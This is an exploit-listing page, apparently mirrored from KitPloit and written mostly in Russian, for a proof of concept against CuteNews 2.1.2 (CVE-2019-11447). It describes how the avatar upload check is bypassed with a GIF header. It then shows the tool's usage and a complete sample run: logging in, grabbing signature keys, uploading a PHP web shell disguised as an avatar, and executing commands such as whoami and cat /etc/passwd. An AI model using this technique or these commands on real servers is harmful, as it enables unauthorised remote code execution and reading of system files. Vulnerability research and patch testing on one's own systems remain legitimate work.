Sploitus

Exploit for CVE-2019-11447-POC

kitploit · 2026-08-25

Exploit Code

MARKDOWN47 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CRFSLICK-CVE-2019-11447-POC
# sadnews

CuteNews 2.1.2 — CVE-2019-11447 Доказательство концепции

POC от CRFSlick, обнаружен AkkuS <Özkan Mustafa Akkuş>

> Была обнаружена проблема в CutePHP CuteNews 2.1.2. Злоумышленник может проникнуть на сервер через процесс загрузки аватара в области профиля, используя поле avatar_file для index.php?mod=main&opt=personal. Отсутствует эффективный контроль $imgsize в /core/modules/dashboard.php. Содержимое заголовка файла может быть изменено, а контроль обойдён для выполнения кода. (Для этого злоумышленник может использовать заголовок GIF.)

## Использование

root@kitploit:~
    
    
    Usage:
    	CVE-2019-1144.py <username> <password> <base uri / login page>
    Example:
    	CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
    

root@kitploit:~
    
    
    ┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
    └─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
    -.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
    [*] Detected version 'CuteNews 2.1.2'
    [*] Grabbing session cookie
    [*] Logging in as admin:p4ssw0rd
    [+] Login Success!
    [*] Grabbing __signature_key and __signature_dsi needed for pofile update request
    [+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
    [+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
    [*] Uploading evil avatar... Done!
    [*] Validating that the file was uploaded... Yup!
    [+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
    [*] Looks like everything went smoothly, lets see if we have RCE!
    [*] Keep in mind that this shell is limited, no STDERR
    
    $> whoami
    www-data
    
    $> cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...